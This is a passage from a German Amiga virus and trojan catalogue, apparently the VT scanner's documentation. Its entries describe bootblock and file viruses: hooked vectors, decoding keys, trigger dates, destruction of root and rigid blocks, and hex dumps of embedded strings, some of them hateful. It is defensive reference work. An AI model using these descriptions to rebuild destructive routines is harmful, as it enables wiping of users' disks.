  4550.            74726163 6b646973 6b2e6465 76696365 trackdisk.device
  4551.            00010820 486f6c79 4772616c 56697269 ... HolyGralViri
  4552.            00000000 03f30000 00000000 00010000 ................
  4553.            00000000 00000000 01c50000 03e90000 ................
  4554.            01c52120 6c6c6568 20656874 206f7420 ..! lleh eht ot
  4555.            79617720 65687400 00000000 00000000 yaw eht.........
  4556.      Nachtrag 07.08.93: es ist ein neuer Clone aufgetaucht.
  4557.          4711 oder Parfum-Virus. Wird von VT im Speicher und beim
  4558.          File- oder BlockITest, als SADDAM-Clone erkannt.
  4559.          Neu ist, dass das Teil mit Hunk-
  4560.          Lab an SnoopDos V2.1 gelinkt war. Lesen Sie unten bei
  4561.          SnoopDos-SADDAM-Virus
  4562.          Blocklangwort: 4711
  4563.            Block:     209
  4564.            34373131 0001a2d0 0001a201 0001a3e8 4711............
  4565.          Im falschen Disk-Validator ist nichts sinnvolles zu lesen.
  4566.          Im Speicher ist zu lesen:
  4567.            6b2e6465 76696365 00010820 50617266 k.device... Parf
  4568.            756d2056 69727573 00000000 03f30000 um Virus........
  4569.  
  4570.  
  4571.    - SAO PAULO Virus   BB   im Speicher immer ab $7FC00
  4572.          Cool $7FF3A  nach Reset DoIo  $7FF56   KS2.04: ja
  4573.          Fordert trackdisk.device NICHT .
  4574.          Namensbegruendung: im BB ist zu lesen
  4575.                   SA0 PAULO!
  4576.          Fast der ganze Block 0 ist leer (Taeuschungsversuch ???) .
  4577.          Der Virencode steht in Block 1.
  4578.          Das Virusteil meldet sich nie .
  4579.  
  4580.    - SARON        Es ist KEIN Virus
  4581.       Es ist ein XCopy 6.5 pro (Laenge: 27196 oder 28020) aufge-
  4582.       taucht, das beim Start im Cli zuerst in grossen Buchstaben
  4583.       SARON usw. ausgibt. Nach meiner Meinung enthaelt das File
  4584.       KEINEN Virus.
  4585.       VT bietet bei Filetest Ausbau an.
  4586.  
  4587.    - SATAN-Virus  BB  immer ab: $7CD30   Cool $7CDA6  im Prg DoIo $7CDD2
  4588.       Fordert trackdisk.device NICHT .
  4589.       Vermehrung und Schaeden: BB
  4590.       Der Text im BB wird NIE erreicht .
  4591.       Namensbegruendung: im BB ist zu lesen
  4592.            21212120 48696572 20737072 69636874 !!! Hier spricht
  4593.            20646572 20534154 414e2021 21212120  der SATAN !!!!
  4594.  
  4595.    - SATAN-Virus   anderer Name EXORCIST-Virus   siehe oben
  4596.       Bitte verwechseln Sie die beiden SATAN nicht.
  4597.  
  4598.    - SCA Dos Kill   siehe bei D&A Virus
  4599.  
  4600.    - SCA!  BB        im Speicher immer ab $7EC00
  4601.         Cool, DoIo
  4602.         Fordert trackdisk.device NICHT
  4603.         Testet aber auf DOS0
  4604.         Sichert seinen Speicherbereich NICHT !!!!!
  4605.         Mit nur 1MB Chip und KEIN Fastmem nach Reset deshalb (DoIo
  4606.         ist dann verbogen) Ueberschreibgefahr und damit GURU. Das
  4607.         liegt NICHT an VT, sondern kann mit anderen grossen Programmen
  4608.         genauso nachvollzogen werden !!!! Ohne Virus im Speicher muss
  4609.         auch mit nur 1MB Speicher der BB sicher erkannt werden.
  4610.  
  4611.    - SCA 2  keine Gefahr, nie bootfaehig, immer GURU
  4612.          deshalb in meinem Prg. nur Nicht-Standard-BB
  4613.          Begruendung: read $200 nach $7FC00 von Zylinder 79 und
  4614.                       dann jmp $7FA00 (alles klar Anfaenger !!)
  4615.  
  4616.    - SCA-666  BB   Clone s.o.
  4617.          Nur Text geaendert
  4618.            20212121 8c783216 416e7469 63687269  !!!.x2.Antichri
  4619.            73740069 7320636f 6d6d696e 67208232 st.is comming .2
  4620.            3216616e 64207275 6c657320 74686520 2.and rules the
  4621.            6d616e6b 696e6421 dc6e0000 4ef90000 mankind!.n..N...
  4622.            00004120 36363620 36363620 36363620 ..A 666 666 666
  4623.  
  4624.    - SCA-Baltasar  BB   Clone s.o.
  4625.          Nur Text geaendert 
  4626.            20202c20 8c783216 42616c74 61736172   , .x2.Baltasar
  4627.            2d566972 75732031 39393420 20208232 -Virus 1994   .2
  4628.  
  4629.    - SCA KarlMarx  BB  Clone  s.o.
  4630.          Nur Text geaendert
  4631.            32166672 6f6d204b 61726c20 4d617278 2.from Karl Marx
  4632.            2056492e 20202021 dc6e0000 4ef90000  VI.   !.n..N...
  4633.            00006663 6b75756f 7920636b 6679756f ..fckuuoy ckfyuo
  4634.  
  4635.    - SCA-MAX-Virus BB  Clone  s.o.
  4636.            6f732e6c 69627261 72790000 44454154 os.library..DEAT
  4637.            4820464f 52205654 20424144 45535420 H FOR VT BADEST
  4638.            4c414d45 52202021 21212020 20d2aa2d LAMER  !!!   ..-
  4639.              ;.....
  4640.            32162047 72656574 73206672 6f6d204d 2. Greets from M
  4641.            61737465 72202020 dc6e0000 4ef90000 aster   .n..N...
  4642.            0000412e 4d41583f 4d41583f 4d41583f ..A.MAX?MAX?MAX?
  4643.          Ein weiterer geistiger Tiefflug von MAX, mehr kann er halt
  4644.          nicht.
  4645.  
  4646.    - SCA-NASA  Virus  BB
  4647.          Nur Text geaendert
  4648.            17646f6e 6520696e 20313939 33206279 .done in 1993 by
  4649.            2041746f 6d697820 bea04113 20206f66  Atomix ..A.  of
  4650.            204e4153 41202121 21212020 2e2e2e50  NASA !!!!  ...P
  4651.  
  4652.    - SCA-PAL Virus BB  Clone  s.o.
  4653.            3216522e 492e502e 20706f6f 72205043 2.R.I.P. poor PC
  4654.            20202121 21202020 dc6e0000 4ef90000   !!!   .n..N...
  4655.            00004121 50414c21 50414c21 50414c21 ..A!PAL!PAL!PAL!
  4656.  
  4657.    - SCA-PDS Virus BB  Clone  s.o.
  4658.            65204779 73692066 6f722070 72657369 e Gysi for presi
  4659.            64656e74 206f6620 42524420 20d2aa2d dent of BRD  ..-
  4660.            17504453 20697320 74686520 6f6e6c79 .PDS is the only
  4661.  
  4662.    - SCA-PKK Virus BB  Clone  s.o.
  4663.            20206e32 5a0e4e41 5a492d56 49525553   n2Z.NAZI-VIRUS
  4664.            20212121 8c783216 4d75736c 696d7320  !!!.x2.Muslims
  4665.            74616b65 20796f75 72206c69 66658232 take your life.2
  4666.            3216696e 20796f75 72206f77 6e206861 2.in your own ha
  4667.            6e647320 20212121 dc6e0000 4ef90000 nds  !!!.n..N...
  4668.            00004121 504b4b21 504b4b21 504b4b21 ..A!PKK!PKK!PKK!
  4669.  
  4670.    - SCA-Sphinx-BB    Clone s.o.
  4671.          Nur Text geaendert:
  4672.            50041f6b 696c6c20 616c6c20 6b6e6f77 P..kill all know
  4673.            6e207669 72757320 20757365 20697420 n virus  use it
  4674.            666f7232 5a0e7072 6f746563 74696f6e for2Z.protection
  4675.            20212121 8c783216 4e75204e 75202e2e  !!!.x2.Nu Nu ..
  4676.            2e2e2e2e 202e2e2e 2e2e2e2e 2e2e8232 .... ..........2
  4677.            32165370 68696e78 2066726f 6d205452 2.Sphinx from TR
  4678.  
  4679.    - SCA-TAI-Virus BB  Clone  s.o.
  4680.          Nur Text geaendert
  4681.            75732020 8c783216 54686520 416e7469 us  .x2.The Anti
  4682.            6c616d65 7220496e 636f7270 6f726174 lamer Incorporat
  4683.            696f6e20 66726f6d 204b6172 6c204d61 ion from Karl Ma
  4684.            72782056 492e2020 dc6e0000 4ef90000 rx VI.  .n..N...
  4685.            00004121 54414921 54414921 54414921 ..A!TAI!TAI!TAI!
  4686.  
  4687.    - SCA defekt oder weitere Clones
  4688.          Es wird immer wieder versucht, das Original abzuaendern.
  4689.          z.B. Block 0 ist Original-SCA, Block 1 (also ab $200) ist
  4690.          irgendein Datenschrott. Ein solcher BB liegt vor und wird
  4691.          von VT als SCA-Clone erkannt.
  4692.          Begruendung: Die Vermehrungsroutine liegt in Block 0 und
  4693.          wird auch ausgefuehrt. Zum Absturz kommt es erst, wenn der
  4694.          Text ausgegeben werden soll.
  4695.  
  4696.    - ScanEbola97-Trojan   siehe bei LiSA-3.0-Trojan
  4697.  
  4698.    - ScanLink-Trojan  siehe bei WiREFACE-Trojan
  4699.  
  4700.    - scansystem   siehe bei SystemScan-Trojan
  4701.  
  4702.    - scan.x-BBS-Bomb
  4703.          Keine verbogenen Vektoren.
  4704.          Reset nach der Zerstoerungsroutine.
  4705.          Es ist ein bnuke15.lha Archiv aufgetaucht. Laenge: 35050 Bytes
  4706.          Dieses Archiv enthaelt mehrere Files, die fuer BBS nuetzlich
  4707.          sein sollen: bossnuke.x 35308, ULOG.X 18560  usw.
  4708.          Ein derartiges Programmpaket mit V1.0 gibt es wirklich und
  4709.          das ist sauber.
  4710.          An ULOG.X ist nun ein Hunk angehaengt am Ende. Dieser letzte
  4711.          Teil ist codiert mit    EORI.B    #$12,D1 .
  4712.          Dieser codierte Teil erstellt 2 Files:
  4713.          a:   BBS:COMMANDS/BBSCMD/L.info   Laenge: 1060
  4714.                In diesem Icon ist zu lesen:
  4715.            00000b41 43434553 533d3030 31000000 ...ACCESS=001...
  4716.            00164c4f 43415449 4f4e3d64 6f6f7273 ..LOCATION=doors
  4717.            3a736361 6e2e7800 0000000d 4d554c54 :scan.x.....MULT
  4718.            494e4f44 453d4e4f 00000000 0b505249 INODE=NO.....PRI
  4719.            4f524954 593d3000 0000000b 53544143 ORITY=0.....STAC
  4720.            4b3d3430 39360000 00000954 5950453d K=4096.....TYPE=
  4721.            58494d00 00000000 00000000 00000000 XIM.............
  4722.          Es kommt also scan.x vor. Das Icon-Bild zeigt eine Steckkarte.
  4723.  
  4724.          b:   doors:scan.x    Laenge: 712
  4725.           Dieses File enthaelt ausser DOS3 und dos.library nichts
  4726.           lesbares.
  4727.           Dieses Teil enthaelt die Zerstoerungsroutine.
  4728.           Ablauf:
  4729.           Ueber Zeiger in der dos.lib werden LWe gesucht. Die
  4730.           Routine wurde sehr aehnlich schon vom Modem-Virus (FUCK)
  4731.           benutzt.
  4732.          Durch die Zerstoerungsroutine werden die Bloecke mit DOS3
  4733.          aufgefuellt. s.u.
  4734.          Es gibt leider KEINE Rettung fuer das Medium. Es bleibt nur
  4735.          Format. Versuche mit einer Syquest und DiskSalv2 waren nicht
  4736.          sehr erfolgreich.
  4737.                    pZyl 1 Bl     22
  4738.            444f5333 444f5333 444f5333 444f5333 DOS3DOS3DOS3DOS3
  4739.            444f5333 444f5333 444f5333 444f5333 DOS3DOS3DOS3DOS3
  4740.            444f5333 444f5333 444f5333 444f5333 DOS3DOS3DOS3DOS3
  4741.            444f5333 444f5333 444f5333 444f5333 DOS3DOS3DOS3DOS3
  4742.          Neu und schlimm: Das Programm erreicht durch  subq.w #2,d1
  4743.          auch den Rigid-Bereich (s.o. pZyl) . Das konnte der Modem-
  4744.          Check-Virus noch nicht. Das scan.x-File arbeitet auch ohne
  4745.          BBS .
  4746.          VT bietet loeschen an fuer:
  4747.          ULOG.X ,scan.x und L.info .
  4748.          Hinweis: falls es bei L.info Fehlerkennungen bei FileTest
  4749.          gibt, informieren Sie mich bitte.
  4750.          Von einer Erkennung der zerstoerten DOS3-Bloecke wurde abge-
  4751.          sehen, da eine format-routine existieren koennte, die genau
  4752.          so formatiert.
  4753.          Hinweis: Falls Sie glauben, dass irgendein Virusteil mit
  4754.          dem formatieren beginnt, schalten Sie SOFORT ihren Computer
  4755.          aus. Sie verlieren dann mit etwas Glueck nur EINE Partition.
  4756.          Das ist zwar schaedlich fuer die Hardware, aber halt der
  4757.          letzte Notnagel !!!!
  4758.          
  4759.    - SCARECROW-Trojan      Zerstoerung
  4760.          bekannter Filename: IO4-INVI.EXE
  4761.          Namensbegruendung: siehe unten
  4762.          Filelaenge gepackt:  #63484 Bytes
  4763.          Filelaenge entpackt: #100348 Bytes
  4764.          Nicht Resetfest
  4765.          Keine Verbogenen Vektoren
  4766.          Ein AMOS-Programm
  4767.          Nach Doc: ein Intel Outside 4 Demo
  4768.          Ablauf:
  4769.          Es wird ein Bild ausgegeben, das auch Text enthaelt:
  4770.          SCARECROW JUST ERASED ALL LAMENESS
  4771.          Danach ist ein Reset notwendig
  4772.          Schaden:
  4773.           - user-startup wird neu geschrieben  Laenge: #4560 Bytes
  4774.             enthaelt dann: Text DevilCheck 2.0 Bugreport
  4775.           - startup-sequence wird neu geschrieben  Laenge: #4924 Bytes
  4776.             enthaelt dann: Text VirusScanList V1.35 Sept. 96
  4777.          VT bietet nur loeschen an.
  4778.          Die ueberschriebenen Files sind nicht zu retten. Legen Sie
  4779.          besser im S-Dir Kopien an.
  4780.          
  4781.    - SCARECROW-2-Trojan      Zerstoerung
  4782.       bekannter Filename: ibrowse2
  4783.       Namensbegruendung: siehe unten 
  4784.       Filelaenge: #327848 Bytes
  4785.       Nicht Resetfest
  4786.       Keine Verbogenen Vektoren
  4787.       Ein AMOS-Programm
  4788.       Nach FileID: IBrowse 2.00 FINAL 68030+
  4789.       Im File ist zu lesen:
  4790.                    000b5261 6d3a5072 6f746563     ..Ram:Protec
  4791.           7400000b 52616d3a 4b696c6c 52444200 t...Ram:KillRDB.
  4792.           002d5241 4d3a5072 6f746563 74205359 .-RAM:Protect SY
  4793.           533a532f 73746172 7475702d 73657175 S:S/startup-sequ
  4794.           656e6365 20464c41 47532052 57454400 ence FLAGS RWED.
  4795.           00295241 4d3a5072 6f746563 74205359 .)RAM:Protect SY
  4796.           533a532f 75736572 2d737461 72747570 S:S/user-startup
  4797.           20464c41 47532052 57454400 00165359  FLAGS RWED...SY
  4798.           533a532f 73746172 7475702d 73657175 S:S/startup-sequ
  4799.           656e6365 00125359 533a532f 75736572 ence..SYS:S/user
  4800.           2d737461 72747570 00215241 4d3a4b49 -startup.!RAM:KI
  4801.           4c4c5244 42207363 73692e64 65766963 LLRDB scsi.devic
  4802.           6520414c 4c20464f 52434500 00105255 e ALL FORCE...RU
  4803.           4e203c4e 494c3a20 3e4e494c 3a200004 N <NIL: >NIL: ..
  4804.           4e494c3a 00000000                   NIL:....
  4805.       Ablauf:
  4806.       Es wird ein Bild ausgegeben, das auch Text enthaelt:
  4807.       SCARECROW JUST ERASED ALL LAMENESS
  4808.       Einige Teile aus dem File werden nach Ram: geschrieben
  4809.       Schaden:
  4810.        - user-startup und startup-sequence wird neu geschrieben
  4811.          Laenge: #1304 Bytes
  4812.          enthaelt dann:
  4813.        ScareCrow
  4814.        Since i now have your undevided attention while you are trying to save
  4815.        what is left of your hard-disk i might as well begin.  usw....
  4816.        - killrdb wird gestartet und nach scsi.device gesucht. Falls ge-
  4817.          funden, wird der Rigid-Bereich zerstoert.
  4818.       VT bietet nur loeschen an.
  4819.       Die ueberschriebenen Files sind nicht zu retten. Legen Sie
  4820.       besser im S-Dir Kopien an.
  4821.  
  4822.  
  4823.    - SCARFACE   BeginIo, KickTag, KickCheckSum, Vec5
  4824.          FastMem nein
  4825.          Vermehrung: ueber BB
  4826.          ResetRoutine, die ueber Vec5 gesteuert wird (Zaehlzelle > $2710)
  4827.          Im BB sichtbar:  z.B. SCARFACE
  4828.          Hinweis: In einer Viren-Sammlung wird ein Scarface II gefuehrt.
  4829.          Mit VT-vergleiche:
  4830.            Scarface:                       Scarface II
  4831.       000: 444f5300 48bddd38 DOS.H..8 000: 444f5300 b1140dbd DOS.....
  4832.                a)   ^^^^^^^^                        ^^^^^^^^
  4833.       008: 00000370 60000006 ...p`... 008: 00000370 60000006 ...p`...
  4834.       010: 00000232 48e77f7f ...2H... 010: 00000401 48e77f7f ....H.
  4835.            b)  ^^^^                            ^^^^
  4836.       328: 732e6c69 62726172 s.librar 328: 732e6c69 62726172 s.librar
  4837.       330: 79000000 00000000 y....... 330: 79002400 0a825555 y.$...UU
  4838.            c)  ^^^^^^^^^^^^^                   ^^^^^^^^^^^^^
  4839.            a) Pruefsumme muss sich immer aendern
  4840.            b) Zaehler
  4841.            c) Bereich, der vom Virusteil als Ablage verwendet wird, und
  4842.               IMMER anders aussieht.
  4843.            Der Viruscode ist sonst bis zum c-Bereich VOELLIG gleich.
  4844.            Sie sehen also, eine Unterscheidung ist nicht zu begruenden.
  4845.  
  4846.  
  4847.    - scsi-Virus     File   Laenge ungepackt: 1560 Bytes
  4848.          reines Zerstoerungsprogramm
  4849.          KEINE verbogenen Vektoren
  4850.          KS3.0: ja
  4851.          Keine Vermehrungsroutine
  4852.          Fileauszug:
  4853.            2c780004 4eaefe3e 4e75733a 24e724a1 ,x..N..>Nus:$.$.
  4854.                                  ^^^^^^^^^^^^^
  4855.            00000000 00000000 00000000 00000000 ................
  4856.            00000000 00000000 00000000 00000000 ................
  4857.            00000000 00000000 00000000 00000000 ................
  4858.            00000000 00000000 00000000 00000000 ................
  4859.            00000000 00000000 00000000 00000000 ................
  4860.            00000000 646f732e 6c696272 61727900 ....dos.library.
  4861.            8b624828 91819187 1e000000 00000000 .bH(............
  4862.            ;;;;;;;; :::::::::::
  4863.  
  4864.            ;;;;  decodiert mit subi.b #$28,d0 ergibt:  "c: ",0
  4865.            ::::  decodiert mit subi.b #$1E,d0 ergibt:  "scsi",0
  4866.  
  4867.          Ablauf:
  4868.            Test ob der Filename (^^^^) "s:$",E7,"$",A1,0 vorhanden
  4869.            ist. Falls ja, Virusprogrammende
  4870.            DateStamp wird aufgerufen und auf $15A0 = 27.Feb.93
  4871.            ueberprueft.
  4872.            -Falls die Computerzeit noch nicht so weit ist, wird
  4873.             mit LoadSeg das Original-Programm aufgerufen ("c: ",0)
  4874.             und durch einen direkten Einsprung abgearbeitet. Danach
  4875.             wird UnloadSeg aufgerufen und das Virusprogramm beendet.
  4876.            -Falls die Systemzeit den 27.Feb.93 erreicht hat:
  4877.             Ueber dosbase+$22 wird die device-Liste durchsucht.
  4878.             Verglichen werden NUR devices (keine Vol usw.) mit
  4879.             scsi  (s.o.). Also ein Test auf vier Buchstaben.
  4880.               d.h. alles was mit scsi beginnt, wird ausgewaehlt.
  4881.                   auch scsi3... usw.
  4882.               NICHT ausgewaehlt wird SCSI oder gvpscsi usw.
  4883.             Danach wird der ROOT-Block berechnet und durch Auffuellen
  4884.             mit Nullen zerstoert.
  4885.             WICHTIG:
  4886.             Da dieser Vorgang in einer Schleife ablaeuft, werden ALLE
  4887.             Root-Bloecke von ALLEN Laufwerken und ALLEN Partitionen, die
  4888.             die Vorgabe erfuellen, zerstoert. Hab ich mit einer Wechsel-
  4889.             platte und drei Partitionen ausprobiert.
  4890.  
  4891.             VT erkennt das Virus-File und bietet Rename mit dem Original-
  4892.             File in c: an. Falls das Original-File in c: nicht gefunden
  4893.             wird, schlaegt VT vor, das Virus-File allein zu loeschen.
  4894.  
  4895.             Hinweis:
  4896.             Mit DiskSalv Repair konnten alle Partition wieder herge-
  4897.             stellt werden, da der Root-Block jeweils neu aufgebaut wurde.
  4898.             Bitte besorgen Sie sich deshalb DiskSalv (neuste Version 93)
  4899.             BEVOR der Unfall passiert. DiskSalv belegt die Partition
  4900.             mit dem Namen wanagi-wachipi . Also so aehnlich wie diskdoctor
  4901.             mit Lazarus frueher.
  4902.  
  4903.             Wichtig 2:
  4904.             Es MUSS ein INSTALL-Programm geben. Dieses ist bis jetzt
  4905.             nicht bekannt. Bitte helfen Sie mit bei der Suche. Danke !
  4906.               Denn niemand benennt freiwillig ein Original-Programm
  4907.               in ein unsichtbares File in c: um.
  4908.  
  4909.    - SDS-schaedl.Prg   Susi_Drive_Stepper
  4910.          KEIN Virus
  4911.          Laenge: 904 Bytes
  4912.          KEINE Vermehrung
  4913.          KEINE verbogenen Vektoren
  4914.          Im File ist zu lesen:
  4915.            65736f75 72636500 73757369 00616e64 esource.susi.and
  4916.            72656100 76616c65 6e74696e 6100696e rea.valentina.in
  4917.            67726964 00636872 69730000 0a000120 grid.chris.....
  4918.          Vorsicht: das File bewegt den LWs-Kopf sehr schnell. Wie lange
  4919.          das ihr LW aushaelt sollten Sie NICHT ausprobieren.
  4920.          Das File wurde aufgenommen um die Erbsenzaehler zu beruhigen.
  4921.          Ich sehe KEINEN Grund, warum jemand freiwillig dieses Prg.
  4922.          starten sollte.
  4923.  
  4924.    - Self-Writer  andere Namen: Pseudoselfwriter   siehe bei Lamer
  4925.          da im entschluesselten Programm The LAMER Ex... zu lesen ist und
  4926.          das Verhalten einem Lamervirus entspricht, halte ich eine
  4927.          Zuordnung zur Lamer-Gruppe fuer richtig.
  4928.  
  4929.    - Sendarian   Revenge V1.2-Clone, Cool, DoIo, Vec5, im Speicher $7e000
  4930.          und Speicherstelle $C0-$FF (Gefahr fuer setpatch-Liste)
  4931.          Vermehrung: ueber BB
  4932.          Schaden: nach einiger Zeit neuer Mauszeiger
  4933.          im BB sichtbar: Sendarian #1Count:
  4934.  
  4935.    - Sentinel-Virus   BB   Excrement-Clone (Texte geaendert)
  4936.          Nachtrag 08.07.93:
  4937.          Es wird auch der Name USSR 492 verwendet, da aber auf "Sent"
  4938.          im Virus selbst getestet wird, halte ich den Namen Sentinel
  4939.          fuer sinnvoller.
  4940.          Cool: $7F47A   DoIo: $7F4C2  immer ab: $7F400
  4941.          KS2.06: GURU B nach Reset
  4942.          Fordert trackdisk.device NICHT
  4943.          Namensbegruendung: im BB ist zu lesen:
  4944.               61727900 53656e74 696e656c 21002d7c ary.Sentinel!.-.
  4945.          Vermehrung: BB
  4946.          linke Maustaste= Abbruch und Cool-Vektor loeschen
  4947.          Test auf DOS-Kennung
  4948.          Test ob schon verseucht mit cmpi.l #"Sent",$6c(a4)
  4949.          Was natuerlich FALSCH ist. An dieser Stelle steht Sent NIE !!!
  4950.          Richtig waere $54(a4). Anfaenger merke, nicht jeder der Texte
  4951.          aendern kann, versteht auch die Codierung. (vgl. bei EXCREMENT)
  4952.          Schaeden: Sobald eine Zaehlzelle den Wert $A erreicht hat,
  4953.             blinkt die LED. Mehr ist bei mir nicht passiert.
  4954.          anderer Name: USSR 492
  4955.  
  4956.    - Sepultura-BB-Virus    Bootblock
  4957.          Verbogene Vektoren: Cool, DoIo, Forbid, DisplayAlert
  4958.          Fordert trackdisk.device NICHT                          
  4959.          Decodiert ist im BB zu lesen:
  4960.            732e6c69 62726172 79000054 68652053 s.library..The S
  4961.            6570756c 74757261 2d566972 75732120 epultura-Virus!
  4962.            6d616465 20627920 4d617820 6f662053 made by Max of S
  4963.            7461724c 69676874 2032342f 332f3933 tarLight 24/3/93
  4964.            003e436f 70696573 3a303031 3c0048e7 .>Copies:001<.H.
  4965.          Der BB wird immer neu in Abhaengigkeit von $DFF00A codiert.
  4966.          Schaden:
  4967.          Sobald eine Zaehlzelle den Wert $F erreicht hat, wird
  4968.          ein Text (s.o.) in Block 880 geschrieben. Bei einer Disk
  4969.          ist das der Rootblock (bei einer Festplatte kann es ein
  4970.          Fileblock sein). Die Disk ist danach unbrauchbar. 
  4971.              Block 880 vorher             Block 880 zerstoert
  4972.          00: 00000002 00000000 ........ : 54686520 53657075 The Sepu
  4973.          08: 00000000 00000048 .......H : 6c747572 612d5669 ltura-Vi
  4974.          10: 00000000 00000000 ........ : 72757321 206d6164 rus! mad
  4975.          18: 00000000 00000000 ........ : 65206279 204d6178 e by Max
  4976.          20: 00000000 00000000 ........ : 206f6620 53746172  of Star
  4977.          28: 00000037 00000000 ...7.... : 4c696768 74203234 Light 24
  4978.          30: 00000000 00000000 ........ : 2f332f39 33004b09 /3/93.K.
  4979.  
  4980.  
  4981.    - SEPULTURA-Virus  File   Laenge ungepackt: 1876 Bytes
  4982.          KS1.3 : ja
  4983.          KS2.04: Endlos-GURU . Sie muessen den Computer ausschalten.
  4984.                  Tastatur-Reset fuehrt wieder zu GURU. Laden eines Files
  4985.                  z.B. KReset ist auch nicht moeglich.
  4986.          Verbogene Vektoren: KickTag, KickCheckSumPointer
  4987.                              Open, Lock, Delete, Rename, LoadSeg
  4988.          Zeitweise verbogene Vektoren: $6c, FindResident
  4989.          Das Programm rettet fast KEINE Vektoren !!!!!
  4990.          Arbeitet mit df0:, df1: und df2: . Mehr Laufwerke hat der
  4991.          Programmierer wahrscheinlich nicht.
  4992.          Namensbegruendung: s.u. lat. sepultura = Begraebnis
  4993.  
  4994.          Ein Speicherbereich wird decodiert mit: eori.b #$FB,(a0)+
  4995.            0000646f 732e6c69 62726172 79006466 ..dos.library.df
  4996.            303a732f 73746172 7475702d 73657175 0:s/startup-sequ
  4997.            656e6365 00006466 303aa0a0 a0a00000 ence..df0:......
  4998.                                  ^^^^^^^^^
  4999.          ^^^^^ unsichtbarer Filename "A0A0A0A0" in Root von df0/1/2 .
  5000.          Die Null der beiden df0: wird bei Bedarf im Programm-Code
  5001.          durch 1 oder 2 ersetzt.
  5002.  
  5003.          Ausgabe eines Textes mit DisplayAlert in Abhaengigkeit
  5004.          von $DFF006 .
  5005.          Fuer DisplayAlert wird bei Bedarf ein Speicherbereich
  5006.          decodiert mit: eori.b #$FA,(a0)+       
  5007.            790000fa 0a486920 4775797a 20212100 y....Hi Guyz !!.
  5008.            0100a014 53455055 4c545552 41207374 ....SEPULTURA st
  5009.            72696b65 73206261 636b2077 69746820 rikes back with
  5010.            74686569 72206e65 77000100 fa232056 their new....# V
  5011.            49525553 21212100 01009632 4c6f6f6b IRUS!!!....2Look
  5012.              usw.......
  5013.          Hinweis: Ein Satz, der decodiert wird, erscheint nicht beim
  5014.           Alert. Wahrscheinlich hat sich der Programmierer verzaehlt.
  5015.  
  5016.          Vor Schreibzugriff auf Disk wird getestet auf:
  5017.              - validated
  5018.              - max $6a0=1696 Bloecke belegt
  5019.  
  5020.          Empfehlung: unsichtbares File in Root loeschen und in startup-
  5021.           sequence die entsprechende Zeile entfernen.
  5022.          VT kennt: 14.04.93
  5023.          VT setzt ALLE Vektoren zurueck .
  5024.  
  5025.    - Sepultura2.26-Virus  File   Laenge ungepackt: 1980 Bytes
  5026.          KS1.3 : ja
  5027.          KS2.04: ja
  5028.          68030 : bei mir GURU 3
  5029.          Verbogene Vektoren: Open, Lock, Delete, Rename, LoadSeg
  5030.          NICHT resetfest (also KickTag nicht mehr verbogen)
  5031.          Arbeitet mit df0:, df1: und df2: .
  5032.  
  5033.          Im Speicher wird decodiert mit: eori.b #$XY,(a0)+
  5034.          XY aendert sich bei jeder Vermehrung in Abhaengigkeit
  5035.          von $DFF006.
  5036.           6C696272 61727900 6466303A 732F7374 library.df0:s/st
  5037.           61727475 702D7365 7175656E 63650000 artup-sequence..
  5038.           6466303A A0A0A0A0 00000000          df0:    ....
  5039.                    ^^^^^^^^
  5040.          ^^^^^ unsichtbarer Filename "A0A0A0A0" in Root von df0/1/2 .
  5041.          Die Null der beiden df0: wird bei Bedarf im Programm-Code
  5042.          durch 1 oder 2 ersetzt.
  5043.          Namensbegruendung:
  5044.          Im Speicher ist zu lesen:
  5045.                                      20536570              Sep
  5046.           756C7475 72612028 56322E32 36290000 ultura (V2.26)..
  5047.          Bitte aendern Sie auch die startup-sequence !!!
  5048.  
  5049.    - SHI-Virus  BB           s.o. Aust.Par-Clone  BB
  5050.          Nur Text geaendert
  5051.  
  5052.    - SHIT-Virus  (BB)   nicht mit KS2.04, nicht mit FastMem
  5053.          KickTag, KickCheckSum, BeginIo, Vec5, $64, $68, $6c
  5054.          haeufig GURU
  5055.          Zeitzaehler: 8 Min
  5056.          setzt irgrndwann $60 auf 0
  5057.          codiert mit: eor.w d0, (a0)+
  5058.                       add.w $xyz(pc),d0
  5059.          Im codierten BB ist zu lesen: Nuked007 (wobei Nu=RTS)
  5060.          Zugeschickt wurde mir der BB als Ethik-BB. Diesen Namen kann
  5061.          ich nicht nachvollziehen.
  5062.          Zugeschickt wurde mir ein BB als HACKERS-BB. Diesen Namen kann
  5063.          ich nicht nachvollziehen (auch nicht im Speicher).
  5064.          Schaeden in Abhaengigkeit von der Zaehlzelle:
  5065.             - schreibt $1400 Bytes ab Block 0   (Absicht ???)
  5066.                  zerstoert also auch Files die ab Block 2 liegen
  5067.             - schreibt in einen Block ab $30 SHIT
  5068.                   addiert 8 zu $10 im Block (bei OFS=NextDataBlock)
  5069.                   addiert 8 zu $14 im Block (bei OFS=BlockCheckSum)
  5070.                   schreibt den veraenderten Block dann 1 Position
  5071.                   spaeter zurueck.
  5072.             Diese Files sind NICHT zu retten !!!!!!!!
  5073.          Hinweis: Da bei BlockKette und BlockITest nur auf "SHIT" an $30
  5074.            getestet werden kann (mehr gibt es nicht), KANN es zu
  5075.            Fehlerkennungen kommen !!!!
  5076.          Gefaehrlich: in weniger als 5 Minuten habe ich 12 SHIT-Bloecke
  5077.             auf einer Disk erzeugt !!!
  5078.          Decodiert ist im Speicher zu lesen:
  5079.            002450a8 001050a8 0014217c 53484954 .$P...P...!|SHIT
  5080.              ;.....
  5081.            6000fd1a 74726163 6b646973 6b2e6465 `...trackdisk.de
  5082.            76696365 00616d69 6761646f 732e6c69 vice.amigados.li
  5083.            62726172 79000000 00003a4b 00fe9c3e brary.....:K...>
  5084.          Beispiele fuer SHIT in einem Block:
  5085.          Beispiel fuer eine Fehlerkennung:
  5086.                Block:    1580
  5087.          0010: 0000062d d4d0f761 4e004255 4c4c4f43 ...-...aN.BULLOC
  5088.          0020: 4b004255 4c4c5345 59450000 42554c4c K.BULLSEYE..BULL
  5089.          0030: 53484954 00004255 4c4c5900 42554c52 SHIT..BULLY.BULR
  5090.          0040: 55534800 42554c57 41524b00 42554d42 USH.BULWARK.BUMB
  5091.          SHIT steht zwar an $30, aber es ist ein Wort "BULLSHIT".
  5092.          Es handelt sich also um eine VT-Fehlerkennung !!!!!! Falls Sie
  5093.          also einen Textzusammenhang herstellen koennen, denken Sie
  5094.          bitte an eine Fehlerkennung. Ich hoffe aber, dass die
  5095.          $30-SHIT-Zufaelle eher selten vorkommen. Es gibt KEIN weiteres
  5096.          Testmerkmal.
  5097.          Beispiele fuer eine ECHTE Zerstoerung:
  5098.                Block:     415
  5099.          0020: a8da2951 a4caa213 00ba84aa 3129546a ..)Q........1)Tj
